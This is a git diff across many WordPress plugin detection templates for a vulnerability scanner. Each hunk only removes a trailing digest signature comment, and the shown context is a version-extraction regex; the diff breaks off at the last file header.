a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index d396a6bacb..97b7306b75 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203b5c90e2ab57ee6be9a68c73a6d814c77a9deb8062bc5c54c9cd71e2cfcdb4ac022100bdba3b7be77b3a0e56c0a6c504a8d636339c9e88f75c20a33fad3d1c0afe1e46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index bb962b75ae..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e667d59dad80c4c2ee459a5642fba4cc5ea63bc9f7777ff1c738a76ea9072a5202205ca9b8b6815552dd51ea3bfd7e88484ffbae2cd038693b755ed1a952c738423d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 09d31df43f..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022010e1b82d3c69591d1aebca1b9aed021ef06e84adf42ccf46a9c92557efb8081302210080f57ee5a78828e128da418574eaa358139a7dd946c2b6932983ba50fc9edc83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 2efacc871e..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210098b9377226068ffb7c748c6879d48b59f538cee26be09d357bbdac4327554f08022100e49922b27c1c8843f3b4e33b91e430d42c65b71d5573729755ace0dc8bec381b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index efe2793811..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022000a10d52a6e46be4e5f061c0d4fe88a327e19b8f3584097cc74cd2301bc6aed1022037fdedf0186dd491cba7d0f70da6063595a43a7fcd6e23c433eec06ef9b5b3e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index c5ec00345a..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f86d88a04b20b6be38883b40472fe510461d9e28597580ffa1a29bb074b6477402207d48b770bf6b44d99d412492ed3a86a90bb8d54081f3a18ffe817ba0fd9f3ffb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index e606336064..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204ec83b4c8f7eb748fbb1ce9f39d5c1851dfc261814a7177740601bfe091a5e7d02207db2e46562c36032dd14134b4f1e6cb26005e4466c4c4388eaea304d87179ffc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index c9acf5bf64..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022052d00a64369c2239ab12056021d1bf4cb5a68c3bd592d392e7ac674c4a11571e0221009835500b46b9536538002d75fa05ad550627bd0c2d30f630b97a2a57655839d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 909db4b234..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220557e8c80f1a26385f636ae0de81d2608a1237f52f139a0e8d95a6e7de196401f022100c57f4e679401a7a7e33683c6ef1055a5d7947b6df35bb4d5f8fd4caa4b3ba4ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 37dcc1761b..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203c4d3bd3692ef3f70eb6677cb5a0597722a2115cd2323394f08958ef2fcff6590220522ff2c5952804754aa0f08df81e4bf499d2c23b7a990f5d4cc51c7d261c45e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 270c3f08a8..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ce30d899682f9ad2c3ebfa0599780728c0383a910d34676dad73eaf61c5f97e302210080f03155fabd5e592fe80feeccf70f75a7c3d3f2880b425d98e64ae25df30eac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1f1045c962..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220524737180dac5948341d7d203e8253d6fc49920b452415b1dcf65499b63a438002200ac8c159aa52c9f852e827541e58078fb4e9d2038ae43940c7af736ca9e952e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 9bf0615c21..18a7437e94 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022027782998e28ed10238a6c56396694f314f2019120bdc833ce89ad1297c1d2b0d02205319e0eaf42564b7632d86c8cb38ec798d9fbb8619a017a3f00c1f0e8a37dcf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 2cf6d15792..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cf39538eeb12617d7b108e615c39d7146ad0ecfe61b9745e40b67e9307f68218022100b12bf7fcf4e4e24479add6e52444ffe3d2d7470ef794c85cf3598137506efe9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 147ddb4faf..b6f392efba 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220747d240ebf4c1dfe3fc417be3ed321c17a02d9d88ee62c354537cebe3cef7b1d0220251e288124c0ffa24d25bc826fb567cad78d7d258dd64aa99ef344be8f744d49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index d5399c3949..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200242f60dd9fed1acf4679642fa23124fa4e0863c324751866fc6b0ddfd6af8d002203aebab0f39f330d3f60ee24c00077ac7592e47aba7036ad2dd0090d082bd5ea1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 2fb72268c5..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c0dff78c669838a7d9dfe629b4fb1284d874af0666bd01b3cdd9458bc7c8b967022034a060a400d05a9101ca363dd177f16ca707362653117c496561276bbfd09294:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 48abddfc18..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201e30ccb44a8ed8b85ec210af0caa24919ab238564c73fbd0e7b4f83f557f0a100220690796c8d7a9e6d25b2515213b52af45eea62cf1fe02480be7d49de39f5ccafd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 5ad9b56756..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eaa42313ab670fe4e6687053b279135caae38cf108ebf84d727e7f13f965ff5802200382673bdbf60a7fa7d536715ee5a26aa70c4b7113326769cb00e034d3e4a112:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 6e37227351..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008c836fc13944ab99065f51b7c1c63a0e28ef062302646c2480c985c9574640ff022100b92e0d0c36cc0279bc9c6bfb22aa10f327c0f24a7f5260e163f18f3c82d9cd24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index 11a66f90ed..c20ed6552a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210084eac8b19f02bffff426a8ad0baccb5b30428fb5ee55cde72a5e6c6cd904727802205f87d508fbb79ac74ff25324e7284bd36414bc2192d12f2ade23afae084860c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index b9bd62d615..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201e6fbc0bd9e82b77071570a77b280e634e90cdfdf520f1a8eed2460c175dec8b0221009ba0e3e0b7b046f0c6df598faf577ff8a00add2a7341a7dbc99f399f96c16b0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index ea6a8c74ab..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022078835071c88cb4877066ea44b8eefbe7ccb1170758bc40da6b95813b37b1f5f102210095c5741c3f6224007e7c967b31d393484b4fbade86bee9cc6fd0cbdbe9bd5603:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 4c5987d231..286dfdaec6 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bdc3128d6a20c6116451e1c3bb8f20c4ad8a7da6c2c34809ac9484f56ace8ac8022100c7a181902cdf89d879e3157010439feb1499d90a7137ed2473cd98ea74c7d5c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 7b6b89917e..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022041b0acbb2791e5139ee96ae85a7b8b26358aee3299dc7f9e0ea3e1eed44353df022100ab9d2744991a56efe90e923eae99f4ccc13a540fabe58305e1ff855fddab42df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 0d9498f575..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220483255a39382250a77691c29ec17ba3c4b1ac6e7d5b67c5f35ab1aa0ad6bc2ca0221009024fc0b2a4e2e85084515d3354f7a8843230e906e502bfe0f8105f6e001c204:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 8e01983e6a..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ad00a86fd755db9c175b8804f83f87c678bed80e6c4afa36f757f883f8d89393022100bb2e665d88fca3cd1079596517b4e59048d783d4c3ca5d3816170e4bc0b91f22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index de282a9bc4..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c06f5e2003e7068cc10ad14a9487ef6cce5b17996888021d89de3f9700222a3102210099816350f0c630c300f28b76a3b847fdc9a5a9a757dc5c287a8191a6b2af1024:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 58dfe2f524..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220186a691bd893574f7c31b1a72476e4fd70dbcf93a043cee40669a37f40ab2632022037cc305ef130a112a373a0ee4afba69942023cf48dff2a83b4c4c1011b075b8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index b7996f3cea..2b29428cf1 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022002f2995dd4cac3580d5cdf08dd2bb1df88f7977161a282b0a1b6a912fb2b088c0220257a09ff1bc48f19ac0f4b55403aab9d69edd5ea5075f56a39dd8a0dcbf873cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index c34815cf58..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b8c8de57b3ef868bc673c544212b1c30d8464c746af266a84464d56b337ccab6022100f986cb5fd5030de614ae7f99b20e4256e77644c82440aaef7e3bd9f9d3d39f5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 53af2b28e0..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b523b3a2fca5b4d676a2cb7e344af8d91df3c309d0096e745bd8a7388fbea6dc022100dac0e84f2a2ee1adf56c1eff50e26c1c287140f2ec791ec173c398df52622eff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index e6de005ad6..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009ed1424f74492a9906e975f2169a5fcf5c604b707de7bee8feee3ee5aae71a4a022100ec24d5ffe1fcd71f4fa4aac8a6e1380d4d7a39343f0354994ba6d2a1c202aa78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index e77981b644..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022046b080ec8343c7f984c417977e97c791be17c75d8ec4e4bf575ca49d2d177c5f02206e1db6d50c84792f0da20a6c1358b1be623b6ce328af9898848f83977d4dd2dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 4fbd7aa78c..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e9b20f8f91791ff1f37ed22e26e05dc33dd3e112d7ec7d1a527165245e39b7a802202c4111faf4fa4bf9c4577c8a99657a4aa3eba9fd1d60efc6b57c1146aa86fe36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 8db1642d33..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220494ca23444c358f769370b23ba07f404d29af2a2051d147effd56d8512186f9c02200c25f8d84c066390c51859627b091aa83f6a558c7006f3e6bbe85c0b09ce392e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 44b25621a2..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c1e4fab3962e49d444f26e80baded135da0705282dbe9b7168fa0c5bcb6c3b4c022072f8aeb520f111bfc58e7ea321083be1a34a054ad24f0d5553b0028233ca86e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 9f8ec0558b..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008be6a9462e881a54dcab0d2cfd2bffe67e16663104d4d0b3f2a66669a9ce86df02202ffa28ec046230974fcd9761f63c9e6a8618dd29dbb365338593ab5f04f87cd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index 6219f30d4c..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205e6ea7990e8579455a76f84b55da17b3d6180a3e2f7a18c372810d53bfbd0000022100fc16ded44ae6941aed283a38a3aa77f31fe5f3e48a5f6d112794f846c1f947e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index d158101f8f..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220752a299781c91592ea684373e70e02de90855fd4983a8150b7f431edbb4eb01c022100934e5134f74e864b7a8acc11adf673ffef8627a45deb8b39e3dd16a79499a534:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index de3c3761d3..f7c9ef9b1f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206b64c9e597f6ab19793b67f6ab5adb736b16556a3fd7b46a59a40bf443fc09790221008f548ec75daf696d09a9727dc366a9ab28c5a2824f4658b576b2d53db222ab32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 39ed5186ad..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200aca9ff808435653b21d49734faad0de2affe0e7a82512abd916d0f1f34950570220377c68a0a91be978c4d3d6034792ecdf088be43378d50f6c9bc2ca2faa562059:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index f6cce6c258..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b23d640c2266394aae35fcf47c9e1279001b18e40d3b8c0c50bd58e8a151cfde02206f36b65784f9826c502e211027fdd9bb121d0054735c8caf7921136145642667:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 95d368b09b..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ff7c9178da5d9a0188f18fad7a07cfe5a64f8090767e113d8f60014108298b27022100c52a3c9bc75bd9fcc39a31d67300aa664481f2d8c1948c20de2a752f088477bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 7855f36c4b..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220383a0db217b6318eb530beeb6b0ab94cc8c19d1a655cfaec6972890dbb1bef55022062f240e689292ba598236be0550d830e12fd0d123f32cdb248da35ef2cbf48a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6ab20ca37a..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008ef25beb80c3607e7dad04936c896ab95b24d1ce1484166bd21dc430b5928113022100925b53961b006e7ab764e3d60c85180f03b839e2bcb2d503464abee835c4c868:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index fbc1d6e104..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ 